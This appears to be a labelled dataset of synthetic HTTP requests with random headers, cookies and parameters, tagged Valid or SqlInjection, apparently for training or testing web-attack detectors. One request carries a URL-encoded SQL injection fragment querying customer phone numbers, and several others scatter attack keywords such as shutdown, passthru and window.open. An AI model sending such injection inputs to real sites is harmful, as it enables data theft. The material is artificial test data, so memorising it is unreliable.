X-Forwarded-For: 133.218.232.127
X-Serial-Number: 09176432061314
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21953
Start - Id: 19323
class: Valid
GET /eCWqzO0mRcGB/ron6yttdai6eeneu/llsnl/sf-ORoI-CxQ11H3CT/a9cu32raJro1natm.pl?duuIOuahlore2=six+it&hFaroiei0ibore=ebiSts6Ei%24iest&oesreom0srn0=+wdtaemolsreunionnb&rlrnlneRimGOo=hgoA_8yzea&9JUDeT1QS=sb_bykdXdmZ&tt=zHb7FLu&Fsystem3NKBcJ=0459&QLJQV=Rr%26&AQ89B@=60betpeaayu&Y3OY6zmGhl=Oirl&EHKWphpPtR1y=36&teolciyvaeb=w%40fTY&soli=aVwc&2vo@=eiUhhwhneo HTTP/1.0
Host: 229.8.9.83
Connection: NnATtyr
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.6, windows-874;q=0.0, utf-7
Accept-Encoding: compress, compress, identity, deflate;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 33.79.28.5
Cookie: ptTcMemb=9Gym;8In5uteted3z=i;EAletafahr4hfe=cgexec+p;rppseddw=truerEIatLs;shautaov5rexdsl=wamxrhddm(te;rEoo=06
Cookie2: $Version="499"
Date: Tue, 16 Mar 04 08:18:10 CET
ETag: W/"PBlJtQQxJPqqifEFl96U"
Expect: o4rseuf
From: Zda4pbA@utsheoe.biz
If-Modified-Since: Sat, 01 Apr 06 18:38:29 UTC
If-Unmodified-Since: Thu, 30 Oct 08 13:38:02 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Dec 08 17:13:30 GMT
Max-Forwards: 351
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM b25pYXJlaXRpbGMwbmNkdnRzb2Fjc2RvNml0bWlSZXNobGxsaWVkSHBuaQ==
Authorization: eowNin hunn5oo9=e2eLant
Range: 32-,34539-5523,215-7
Referer: /6eoge.exe
TE: gzip;q=0.2,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/4.7 (Windows; U; Win98 0.7; rh-cw; rv:1.3.7) Gecko/63159755
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5443x8172
Via: jotnq/2.3 108.176.1.37, 0.9 www.r8ilEy.jpeg
Transfer-Encoding: compress
Upgrade: sahcq/0.1
Warning: 333 161.38.217.77 "ytiqpMa5" 
X-Forwarded-For: 83.53.98.240
X-Serial-Number: 0947873125180577061
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 19323
Start - Id: 18430
class: Valid
GET /hj8LakN1f0_Lwf/4HZ8aVIleQT0nu/q-78oBw4V8l2hB_dVY/ozWG/nltlsn/yN/tshutdownPEGX/esot1mcp/evalSaOvEQdV.B8xchildh/t6MHIt89IBNJSsEH/rnMolh.css? HTTP/1.1
Host: www.uo8Sdp8.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 188.106.227.101
Cookie: r2rktInf=45270568;oe9gptTeeaafaet=thliket;owadt=lahslareorr2o;eef=7759;cxaemeyenistet=6adFhozoertelh0;yrtew=6388
Cookie2: $Version="45"
Date: Fri, 12 Feb 10 02:36:48 CET
ETag: "v-EN3eDfceKAwK7tP"
Expect: iftEr5=soa9fL;oik4z=Suya
From: sen0esya@3Yt7.ch
If-Modified-Since: Thu, 22 Feb 07 21:12:34 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:59:22 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 27 May 04 24:50:56 UTC
Max-Forwards: 52
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic dzZoYW9kOmV0bmUzYWU=
Authorization: NTLM dXNzdHV1ZWRzeERkd3FvZWU5aUxnYTgwc3Nzbm9pbEd0dW5lZQ==
Range: 999-,-21,-8622
Referer: /g1Ak30/g0rdaded/xbtvteim.mspx
TE: trailers,deflate,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 2.4; ns-tt; rv:3.0.9) Gecko/57064306
UA-CPU: Sparc
UA-Disp: 3029,548,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 564x888
Via: 4.5 219.55.109.168, rrnses/6.1 196.6.98.229, 2.6 85.85.188.68
Transfer-Encoding: compress
Upgrade: er0ua/3.6
Warning: 667 www.dfn3lro.gif "uson3n" 
X-Forwarded-For: 94.17.82.121
X-Serial-Number: 562102259881666351
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18430
Start - Id: 30550
class: Valid
GET /dhoLldees/aKV7De-_TEn5yR/etrvseeIan7/frahzs1ns/nSCt.gif?nhrkDu1l=oEfimhenc0tntiq&rc=n&a0rnllargee=+ao%29+ HTTP/1.0
Host: 104.19.30.229
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: ttlr4-benNsowi, ToeuNu-o6oi0dI, racehnig-Era;q=0.5, fSeh-le, ido2ee-6esojoe
Cache-Control: no-transform
Client-ip: 43.234.64.72
Cookie: rtioodrezq=selectP
Cookie2: $Version="485"
Date: Wed, 28 Apr 04 09:48:07 GMT
ETag: "@8CvfohAFcn7d-@5OH"
Expect: meez
From: fulner@n7m8d5nmt.de
If-Modified-Since: Sun, 08 Aug 04 06:42:57 CET
If-Unmodified-Since: Sat, 21 Jun 08 06:21:27 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Dec 08 14:29:40 GMT
Max-Forwards: 6653
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest response="4dDf5dd21A0133e5daCaF55eCeDfea5a"
Range: 369478-
Referer: /hnthh/shno/RHohai/6hyay/weenNeii.avi
TE: trailers,trailers
Trailer: Trailer
User-Agent: t1mntDmc (tOBMS5; sdgSPUIbRX; huMKADUnsR)
UA-CPU: 68000
UA-Disp: 9253,211,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5611x433
Via: FTP/0.2 www.txp7nNn.tiff, HTTP/3.0 www.ns7tei.js
Transfer-Encoding: deflate
Upgrade: oro/8.8, a9o8/2.0, urC/3.4, 2oa/9.5, qDe/0.4
Warning: 671 140.154.212.102 "5oe5aeyToglnofojo" "Thu, 27 Mar 08 22:18:58 GMT"
X-Forwarded-For: 197.167.252.1
X-Serial-Number: 60141
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30550
Start - Id: 21985
class: Valid
GET /lwTgu5lsella/tijbov/a5u.tiff?lte8ruhgoary=wf&Iuol67fio=eue1yl&eaabo6cejeToo=g+%3B%7Ecwo&thrtaaub5ch=8471920&jmsftwLo=6&includenCTpassthru9=415&hscrvot=tmeRw&Al0passthru=awindow.open&Lhob=65&e2JoSa=6210&styonidFhSskflv=187&lklwindow.openB4hs=2841463&Emerooys=dttsaono&aaEt7pow=nn3y6 HTTP/1.1
Host: 80.22.144.105
Connection: keep-alive
Accept: video/quicktime;q=0.5, video/*, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: l-E;q=0.6
Cache-Control: max-age=93
Client-ip: 114.150.253.168
Cookie: w.C8XF7cZNN=e;Yaei=eOincludeoeet6moj5
Cookie2: $Version="3"
Date: Sat, 30 May 09 21:24:57 GMT
ETag: W/"w8_ObORHhZaf2C@l8y3"
Expect: s9aD
From: suceO@teSeaq.com
If-Modified-Since: Tue, 29 May 07 21:10:32 CET
If-Unmodified-Since: Fri, 13 Nov 09 15:20:06 GMT
If-Match: *
If-None-Match: "LK0gvAbcOSw4mIDzT@lc"
If-Range: *
Max-Forwards: 05
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ein0n
Authorization: Digest algorithm=cneet
Range: 2-874,8-,3113-623962
Referer: http://s7eh4.biz/ymVY9/uuhxan/nhsace/xo3si.wav
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: 67nerssed (hFK.g2; s8DREe; hmbaC7Z8G; gpjM-Xz0w)
UA-CPU: MIPS
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3071x562
Via: 1fn/0.6 www.4mt0e.htm
Transfer-Encoding: bpoeo
Upgrade: lNr/0.6, FgiMt/6.3, 7iia/3.0, u6itd9/1.6, 61cpb/8.8
Warning: 029 www.zsherB.css "Rh1ouee3zlgNaapmibi3" 
X-Forwarded-For: 8.4.31.107
X-Serial-Number: 920022590702
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 21985
Start - Id: 30324
class: Valid
GET /roSnaj9amrew/idw64/svnbrliiuianltar/e7esXfca_gvePHD78Aq7/ductc/e2ZMMWLyygehLrU0/IuIkdiObllta/xgp5i/76aHIqm/64/eneiseoleed6ono.tiff?zE5Ccopyxa1Onetcat=749366&3AFWgs_jw6cu=m&funnishvsei0toe=setwithgsaalfryos&asoafautO9=ny&L8rtbhteqt=622529&z0ee=57258&jjdqstztergaho=423&ld7=ebgsound9dp+4t&zhreeoronpolt=4&ahwes=229270&fhdus5vs8aEEnb=7775828&eoohsorwH=gwtscshwouseetsTn&sfrsrtxupza=+mahsdsdtur&eSml=ngnic6o HTTP/1.0
Host: www.lloit.st:80
Connection: keep-alive
Accept: image/*, application/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 55.72.70.181
Cookie: d81eqatnA=swutGea0owd3pww;ublhv=cesfuti;t9adaa=54940915;1ltulrdi1a=7741356
Cookie2: $Version="1"
Date: Fri, 09 Dec 05 19:23:44 CET
ETag: W/"uaTGlGF-qbMung2oH"
Expect: 100-continue
From: rddr@loSah.st
If-Modified-Since: Thu, 30 Oct 08 03:31:10 CET
If-Unmodified-Since: Mon, 13 Feb 06 04:25:28 UTC
If-Match: "2TNoZ_VX93PUmncWFC"
If-None-Match: "9riHZzKimkzNofH0WR"
If-Range: Mon, 02 Jan 06 03:58:44 CET
Max-Forwards: 684
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM eEdyZXdraHJBZWFsY1FjaGhpc2xlM25pdEVPYVJzY2RkdFNnZXR0bnNuZmFud20=
Authorization: Basic aUlwdDpjYmR1
Range: 3-440226,69-6
Referer: /moi9dri/anB5n/9ywahuc/erDe7iyt.jpeg
TE: trailers
Trailer: Connection
User-Agent: ngWC870 http://www.Wr6er.org
UA-CPU: 68000
UA-Disp: 2673,3726,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3971x442
Via: hkhtj/9.0 54.73.185.162, HTTP/2.2 132.19.202.1:123, HTTP/5.4 208.127.63.24
Transfer-Encoding: compress
Upgrade: iure/4.9
Warning: 232 99.201.159.8 "oAqfnetTzahmyttdf" "Fri, 04 Jul 08 05:10:09 UTC"
X-Forwarded-For: 209.241.65.202
X-Serial-Number: 60742
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30324
Start - Id: 31551
class: Valid
GET /etzrna/h7inh5Grmg/rwo0XM/2pzBA7f/7eooi4nTaafcez/cI/jXq/unOfEs8rhoer.asp? HTTP/1.0
Host: www.eetemmk8dM.biz:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1255;q=0.1, cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 234.66.106.126
Cookie: toarErdn=end;rOPemrhss=e&n|Leaibustdinuadminse;teip8ood4s1hLTE=fqiaijxoeoefsgheW;n6rhhiidetn=931985;8biYynrixtm=1?up;ha9atote=)i
Cookie2: $Version="3"
Date: Sat, 23 May 09 10:10:29 CET
ETag: W/"w4kvgE8p5Yau4wovab"
Expect: nt8d=eaai;eeT1z
From: 2ief@fcey7.uk
If-Modified-Since: Mon, 15 Mar 10 14:23:50 GMT
If-Unmodified-Since: Fri, 25 May 07 21:07:57 GMT
If-Match: "DmADQ8BMyFfbQtj8eRA"
If-None-Match: *
If-Range: Mon, 23 Feb 09 08:29:42 UTC
Max-Forwards: 64
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM dE1laXRucXB0bjJ0ZGRybHlpYW9ubm50c3JobnVtZXpoZGhhZWU=
Authorization: 9ceog 98Nso=lLcyhti
Range: -98393
Referer: http://www.ymvjra.fr/esa2tai/eaCrs/dedamt/sRpice.php
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 2.4; ea-er; rv:2.4.2) Gecko/88681576
UA-CPU: x86
UA-Disp: 201,1395,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8565x5206
Via: ipe/9.1 www.atAgo7bU.html, HTTP/6.9 196.208.94.203
Transfer-Encoding: seisc
Upgrade: iwe/8.2, ep3eof/7.6, paia/0.4, e4dhI/1.4
Warning: 368 www.ergmb.gif "hlleNwwiAeidy" 
X-Forwarded-For: 231.71.249.70
X-Serial-Number: 7616561595248452
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31551
Start - Id: 25134
class: Valid
GET /tZS67eb9xyu@T8Mc2et/t9zmea6sNNsh/mVUvuA@BZDUGNopt-/6jf/o-3eLgH4QQu.htm?sf=c50imZ&gOaitdomnat5s=ls%3Copth%24w%7EanbzA&gSFesui8wLr0hox=mhdCmig+%3Fmupdatees&tvcjttanRdeu8le=106069&etcLzzT=elr%3D%3A4aAa%3Ceer&@FzS=najet&flJinsertdTZscript=9&athed=7858679077 HTTP/1.1
Host: www.bs8eetw.cz:6
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.1, x-mac-arabic;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: mtd='t'
Client-ip: 149.26.236.30
Cookie: op=>eaday;5i=n5u6Nw;3tnof=9emzexec@dana&ior3anc;rl=02181444
Cookie2: $Version="0"
Date: Sat, 14 Feb 04 15:39:53 GMT
ETag: W/"OdqQGT-K5rFaplwUgeJ"
Expect: e9td
From: ucsmIesc@tbh3i.it
If-Modified-Since: Sun, 11 Apr 10 19:20:08 CET
If-Unmodified-Since: Wed, 23 Jun 04 23:57:39 UTC
If-Match: "Qck8wESYDJbFuxYU4f"
If-None-Match: "YWBh.eGmJm5pZ_WNtlW"
If-Range: "Qh433LqHvUaKo.w6s"
Max-Forwards: 50
MIME-Version: 1.2
Pragma: rae='ltdlsi'
Proxy-Authorization: NTLM b3JkdHBhMWFvaGVsYXRFZWUzMG9pajlpc25vaTl0YW5udW4=
Authorization: Digest username="lgyc"
Range: -47756
Referer: /oiiuud2h/ennyo.cfm
TE: trailers,deflate
Trailer: If-None-Match
User-Agent: Mozilla/5.4 (X11; U; Solaris 4.7; hi-2o; rv:5.4.2) Gecko/11050940
UA-CPU: PowerPC
UA-Disp: 037,012,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5457x802
Via: asfn/5.4 242.128.126.84
Transfer-Encoding: gzip
Upgrade: oulp3p/8.2
Warning: 667 www.ecitwrb.jpg "hagkslkdeoiEwoaeL" "Sun, 08 Aug 04 11:38:20 GMT"
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 04027
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 25134
Start - Id: 23985
class: Valid
GET /aeiudeunp/elge/nb4HY/iiO7/okl8mBwFK1Uz4mR6gb/hkpWFah4M/8O.CPtLconnectXIF06O/RA5/eoeyv7mnttyedoqlmnaH/nZYCchildeZcTPJA/a7np4_@w-s/C4JIQCSHeg.from65.msf? HTTP/1.1
Host: www.eEcrfwyo.ch
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-8-i, x-mac-chinesetrad;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 98.45.103.252
Cookie: trEaDkdrtcTr=flc;ntnmh=h?ol/mmsock_streamiiin1
Cookie2: $Version="6"
Date: Thu, 06 Sep 07 01:18:21 CET
ETag: W/"S8SpMd3ksau@hp111U_"
Expect: mnzbnee=ldSdec
From: rESt9@oraehs.ch
If-Modified-Since: Thu, 13 Jan 05 07:33:06 UTC
If-Unmodified-Since: Sun, 21 Oct 07 14:20:44 CET
If-Match: *
If-None-Match: *
If-Range: "uDSYT_11JgfQUu6@kvv"
Max-Forwards: 5927
MIME-Version: 7.7
Pragma: c=tdmleeO
Proxy-Authorization: NTLM a2dDM2Fvcmllc3Rlc25hdG1tbG1hY3cyYXF5NXQ5ZTJ0Y28wb3RF
Authorization: Digest nonce
Range: 57-083666,74376-4577,088-
Referer: http://lonb9ha.net/eesr.doc
TE: trailers,deflate,chunked
Trailer: Cache-Control
User-Agent: tlvnoqunt
UA-CPU: StrongARM
UA-Disp: 5815,0896,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 9462x9144
Via: 4.3 www.lfO25qni.css, 3.0 www.g7eeCTt.gif:642, 8.3 www.pya0v.htm
Transfer-Encoding: compress
Upgrade: 1in2/8.8
Warning: 097 www.wrfc.jpeg "otniol0w" 
X-Forwarded-For: 53.58.146.5
X-Serial-Number: 336999
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 23985
Start - Id: 2427
class: Valid
GET /uyh83ZiSmgIgQ.shtml? HTTP/1.1
Host: www.ewrlrxaK.net
Connection: close
Accept: */*
Accept-Charset: iso-8859-2, x-mac-icelandic, x-mac-turkish
Accept-Encoding: gzip;q=0.7, gzip;q=0.6, deflate, compress;q=0.3
Accept-Language: T4-ge;q=0.3, d-hiqf2n4s, orvoam-4xtrh;q=0.4, RwtOxl-8srsnGo;q=0.1
Cache-Control: no-transform
Client-ip: 9.30.24.80
Cookie: zdyeqqrv=3;c8cx=7348796567
Cookie2: $Version="593"
Date: Thu, 01 Feb 07 19:43:07 GMT
ETag: "9k0RaHlNgkWC-i0G"
Expect: ofld=1vaEplnp;ehzrxmsC=rzsh7r4
From: enlhjlne@u3aeaeei.biz
If-Modified-Since: Fri, 05 Feb 10 10:34:28 UTC
If-Unmodified-Since: Sat, 10 Jul 04 14:39:28 GMT
If-Match: *
If-None-Match: "5smLn@q3I-AaIWlt"
If-Range: *
Max-Forwards: 4481
MIME-Version: 5.2
Pragma: sb='aaya'
Proxy-Authorization: NTLM ZVVuQWl0cmV0MEVnZmhvbHNlYWhpMmVMdG9yejV5ZG9pcmllaTVuT2xld2hsbFJs
Authorization: Digest qop=auth-int
Range: 90-3
Referer: http://05ewY.be/eoaI/germt.htm
TE: chunked;q=0.4,gzip;q=0.4,deflate
Trailer: Date
User-Agent: Mozilla/4.0 (Machintosh; U; Mac OS X 4.5; aa-es; rv:9.4.0) Gecko/68556760
UA-CPU: Sparc
UA-Disp: 012,6333,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 213x610
Via: FTP/3.1 www.Hrin.jpg:91, EyEon/5.4 57.213.240.10, FTP/4.4 www.Urr76.png
Transfer-Encoding: deflate
Upgrade: tohtr/2.9, 8im/0.4, Looyi/2.2, csa/7.6, tleia/7.4
Warning: 492 www.astoe3u.js "irotdAesefitoeiuos" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 171121523233
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2427
Start - Id: 42285
class: SqlInjection
GET /efDcj/eA0ygVI/2nolc/DJW7Evo/sisacowh/i0k6/tNsyttik/iaubxoe6seuii/en2dtdn/9Niftoocamd2dharh/rVotoxrenmM0yraMz/ondddhswie.png?7bsEcsdi=pa&aepruh=oihzot%27-5+tdrljt6%3E&IQWalsdmochaV=e+ol0&AVf4=lqs&eImeecgLsiteahv=tVUL&cl=hX.3I&wlfiaen=036970&ous=01hzgh&oGep9=%27select+++++customer_phone++%27%7C%7C%27from+customers+++++%27%7C%7C%27where+++customer_surname%3D%27%27%27%7C%7C+++++lv_surname%7C%7C%27%27%27++++and++customer_type%3D1%27%3B HTTP/1.1
Host: 198.97.89.74
Connection: a6hmaap
Accept: video/quicktime;q=0.9, text/xml, text/html;q=0.9
Accept-Charset: x-mac-greek;q=0.9, koi8;q=0.0, cp-932, euc-tw;q=0.0, windows-1257;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 94.165.178.34
Cookie: odshhisdio5=5xlQqQ;snz=zohprlmgehh;;Sa2acds8dtlotsb=satmys;8fwem=mb7eEi4dtbduQpfeti;ft5dltprg1adA=ts;sbpgxtllwtfcd=ehmyye ynswemg 0-r
Cookie2: $Version="134"
Date: Tue, 31 Aug 04 17:54:57 UTC
ETag: "R5X6Mr66Uc_-mrSq2"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Sat, 01 May 10 14:27:56 CET
If-Unmodified-Since: Sun, 31 Jul 05 24:20:45 GMT
If-Match: "TIvclBse10CwPioieO"
If-None-Match: "kvNQXDDH7cBkIqEjNv"
If-Range: "6kNai0wxdgBmfbZ"
Max-Forwards: 904
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: ojo1 2ea21rtw=lubthm
Range: 882861-05
Referer: /fvhn/rmreuat/3Edga/mW8edt/rloE.tar
TE: gzip
Trailer: Upgrade
User-Agent: ejua/2.4.8.4.3
UA-CPU: Sparc
UA-Disp: 8058,0040,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 323x892
Via: HTTP/4.9 www.t7IsaWuQ.html, 0.3 www.dta9.tiff
Transfer-Encoding: gzip
Upgrade: egf/1.1, bses/7.3
Warning: 767 136.91.228.117 "ogadceLeitGounodog" 
X-Forwarded-For: 27.160.160.90
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42285
Start - Id: 10426
class: Valid
GET /t08DMIVY..cgi? HTTP/1.0
Host: 41.179.45.180
Connection: close
Accept: text/*, text/html;q=0.6
Accept-Charset: x-mac-japanese;q=0.5, koi8-r, windows-874;q=0.7, iso-2022-jp
Accept-Encoding: 
Accept-Language: 0nsqot-tr;q=0.8, ah9mcdB-8ta;q=0.4
Cache-Control: Weca2='eti0tn'
Client-ip: 80.130.76.249
Cookie: oaiqs3e05remtc=yGFX4@D;haeskc=ghe.ap;dnalpo9ai=32
Cookie2: $Version="88"
Date: Sun, 17 Sep 06 24:59:21 CET
ETag: W/"Sh55QdVC-KADJ-6QF42"
Expect: 2l4aoAie
From: Lliy5dod@Ctlbdod.com
If-Modified-Since: Wed, 20 May 09 22:35:42 CET
If-Unmodified-Since: Mon, 09 Jan 06 08:44:21 CET
If-Match: *
If-None-Match: "QFjoOTveX7i_rCry"
If-Range: Fri, 11 Jul 08 20:44:15 CET
Max-Forwards: 5353
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic YmR2d3M1clQ6bTlycw==
Authorization: 0na3 6daIi=eooxuw
Range: 5-355295,61313-1,05930-37268
Referer: /hGswdN8i/i5dneie.mp3
TE: chunked,chunked;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/7.4 (compatible; Konqueror/3.8; WinNT; nYxqEy; ttnlews; slnu31dl4)
UA-CPU: StrongARM
UA-Disp: 1729,6694,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 679x5357
Via: 1.2 www.ri0egNno.jpeg:4897, HTTP/0.2 243.42.129.9
Transfer-Encoding: deflate
Upgrade: hfsjm/5.3
Warning: 281 www.ro2salxO.css:58 "iwbhu" "Sat, 21 Jun 08 08:29:13 CET"
X-Forwarded-For: 152.133.229.225
X-Serial-Number: 664473
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 10426
Start - Id: 762
class: Valid
GET /rmcpcyRckwbuhSq.asp?sRfduhlNmo=1497478464&cil44ddde7rtiel=P%5C2bonol%28k&Nrnteb=sshutdown%7CDr%40aiheym HTTP/1.1
Host: 204.90.63.71
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 197.141.119.53
Cookie: Fx7119a3Xlr9=40952;mstroi1htoterh4=s;hnioe=cQmr4
Cookie2: $Version="0"
Date: Tue, 03 Jun 08 04:22:02 UTC
ETag: "anvX4gw6DIXhJA2XR6I"
Expect: 100-continue
From: eet5ayi@trifo.it
If-Modified-Since: Thu, 15 Mar 07 03:14:49 CET
If-Unmodified-Since: Thu, 15 Apr 04 22:17:48 UTC
If-Match: *
If-None-Match: "MGgGHrIQJQ3Vxm1X-"
If-Range: *
Max-Forwards: 025
MIME-Version: 0.6
Pragma: 5uraio=f
Proxy-Authorization: 9eT6pJ noloyso=splar
Authorization: iiou Nerd=nrpanwnD
Range: 74705-710
Referer: http://c2uoklek.com/uteas/aanieeei/hcche/iageamE.jsp
TE: deflate,trailers,gzip;q=0.3
Trailer: Range
User-Agent: Mozilla/6.0 (Windows; U; WinNT 9.3; eo-9g; rv:2.2.9) Gecko/11077109
UA-CPU: PowerPC
UA-Disp: 4382,1693,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 802x453
Via: 7.8 27.107.78.69, HTTP/8.1 www.sniej0i.js
Transfer-Encoding: gzip
Upgrade: sNnb/0.0, sioc/7.0, inmmI/4.9, btat/9.8
Warning: 393 16.23.206.208 "aeeyywi82NiChtaec" 
X-Forwarded-For: 126.215.82.178
X-Serial-Number: 647816
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 762
Start - Id: 5305
class: Valid
POST /taywieNRxtro/nf5px4SPM38MAPbhZX_c/iaOjXhO/OZJsNe/t1-/hSM8_xqT/Ie9oesh4ossuhyeI3es/mBOnIDH.png? HTTP/1.1
Content-Length: 211
Content-Language: oe,5lt5elo,oE
Content-Encoding: identity
Content-Location: http://www.aftibd.st/hoie/mzftbtdh.png
Content-MD5: Ymx0bmdkbWZhY2FsbWF0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Apr 05 22:12:13 GMT
Last-Modified: Sun, 03 Feb 08 08:49:16 UTC
Host: www.gvgansss.fr
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1, x-mac-japanese;q=0.8, x-mac-chinesetrad;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 32.242.144.60
Cookie: lCrRD5ECN3tohUu=sRajV;UK35x=e;am= t8261lfyscriptuus;bmGZ1XY=8;uf6window.openQN6ftp=nD1_59yU
Cookie2: $Version="0"
Date: Fri, 03 Apr 09 16:37:38 UTC
ETag: "NFTGQ1TBxgd8RxUJl6"
Expect: enfl
From: naRoHav2@prVrEyldam.com
If-Modified-Since: Wed, 12 Oct 05 06:22:14 CET
If-Unmodified-Since: Fri, 30 Apr 04 08:04:08 GMT
If-Match: *
If-None-Match: *
If-Range: "ByB10mQEeqYGAFb"
Max-Forwards: 807
MIME-Version: 6.3
Pragma: m=o
Proxy-Authorization: Aaaf lnogj4h=etlars
Authorization: Basic ZTA5aGx5Omxmc3J4bg==
Range: 8822-34,539805-
Referer: http://www.fllde.st/8jtars6/yYItorsu/anis.mspx
TE: gzip,deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.7 (X11; U; Open BSD i586 0.8; rt-en; rv:0.9.9) Gecko/25668200
UA-CPU: 68000
UA-Disp: 370,737,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4339x4945
Via: FTP/0.8 137.197.99.113:681, 7.1 www.scrl.jpeg, 4.6 108.116.178.155
Transfer-Encoding: identity
Upgrade: s6e/1.2, nTe/7.0, nedeCt/2.1
Warning: 218 43.28.61.59 "ovEe0ysqedar" "Wed, 21 Apr 10 15:43:26 GMT"
X-Forwarded-For: 194.87.49.44
X-Serial-Number: 6090087986849
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TaliH=63073727&aefldei=01059&nsglo=lCONMPw6.M&ade=52006690&dSefa5te=tpserisc&azs5ru=269&DTrruooz=HmNsae&aizdieT2ffl=8&auewdeIu1=ygne6eay1eioi&qc=/9o9ie0i&UwSPwindow.open=o60UKgnGF&cftdjaoaaok4=dallPtonerela1ee

End - Id: 5305
Start - Id: 2009
class: Valid
GET /tasocg/Agtiaigsza/cwlsknAetasIu/7GwmBaPS/e1v09aRo/vwyIg.AkgSlocxKSa/Lr8rss9b0slase0ef/rupe1.-hnKuPOvabt4Q6/ezdlalvetthuorec/vb8/nB@y/e3Ujx2msOw96Om23xAwy.gif?phnRx2Xv-winnt9=metafeell%24havingoe&aHi1riioas=3+wMc&pzRsoiscrd=932918&oitMareniba64=lefoiztGfpphezOl&eILooMAekdlintl=c7CjCbz1-&whB5object=%2Fuo&TeaEdUaalecppis=rDqx%2Fa&rOzdoewe=5637041621&sUcrIosorbp7=0014757&Nt_E@MI=n&txo4ya7=31582238&oonrdstwlo=7&otk=94873752&dfecnageteth=ez0 HTTP/1.1
Host: www.EgctI.biz
Connection: pefs
Accept: */*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: zw-89r;q=0.1
Cache-Control: max-age=26523
Client-ip: 30.211.1.172
